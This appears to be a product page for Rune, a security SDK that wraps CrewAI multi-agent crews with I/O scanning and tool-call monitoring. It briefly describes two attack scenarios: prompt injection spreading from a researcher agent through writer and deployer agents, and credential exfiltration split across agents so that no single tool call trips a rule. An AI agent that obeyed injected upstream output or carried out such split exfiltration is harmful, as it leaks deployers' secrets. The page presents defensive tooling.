Secure Multi-Agent Workflows Before They Ship
CrewAI orchestrates multiple agents working together — each with their own tools and objectives. But multi-agent systems multiply the attack surface. An injection targeting one agent propagates through the crew as other agents trust its output. Rune wraps your entire crew with two layers of protection: crew-level I/O scanning and per-agent tool call interception.
from rune import Shield
from rune.integrations.crewai import shield_crew
shield = Shield(api_key="rune_live_xxx")
protected_crew = shield_crew(my_crew, shield=shield)
# Entire crew is now protected — all agents, all tools
result = protected_crew.kickoff(inputs={"question": "..."})Real-World Attack Scenarios
Inter-Agent Escalation
A compromised researcher agent passes manipulated output to the writer agent. The writer treats it as trusted input and includes the attacker's instructions in its deliverable, which the deployer agent then executes.
Without Rune: The attack cascades through all three agents. Each trusts the previous agent's output, amplifying the blast radius with every handoff.
With Rune: Rune scans data flowing between agents. When the researcher's output contains injection patterns, the handoff is blocked and an alert fires before downstream agents are affected.
Tool Chain Exploitation
An attacker exploits the interaction between agents' tools. Agent A reads credentials from a config file. Agent B, processing Agent A's output, sends them to an external API — each step looks benign individually.
Without Rune: The credential exfiltration succeeds because no single tool call violates a rule. The attack only becomes visible when you correlate actions across agents.
With Rune: Rune tracks tool call sequences across the entire crew. The behavioral layer detects the read-then-exfiltrate pattern and blocks the outbound call.
How It Works
Install the SDK
pip install runesec[crewai] — adds the crew wrapper with two-layer protection for multi-agent workflows.
Wrap your crew
Wrap your crew with shield_crew(). Every agent's tools are individually scanned, and data flowing between agents is monitored for injection patterns.
Monitor and enforce
View per-agent events in the dashboard. See which agent triggered which alert. Define per-role policies — the researcher can read but not write, the writer can draft but not deploy.
Frequently Asked Questions
How does Rune handle inter-agent communication?
Rune scans at two layers: crew-level I/O (inputs/outputs of the entire workflow) and tool-level (individual tool calls by each agent). Data flowing between agents is checked for injection patterns.
Can I set different policies per agent role?
Yes. Each agent in the crew gets its own security context. You can define role-specific policies — restricting which tools each agent can call and what data it can access.
Does it work with async crew execution?
Yes. Full support for both kickoff() and kickoff_async(). Security scanning adds minimal overhead to crew execution time.
How do I debug cascading attacks across agents?
The Rune dashboard shows the full event timeline across all agents in a crew run. You can trace exactly which agent was compromised and how the attack propagated.
Secure your CrewAI agents today
Add runtime security in under 5 minutes. Free plan includes 10,000 events per month.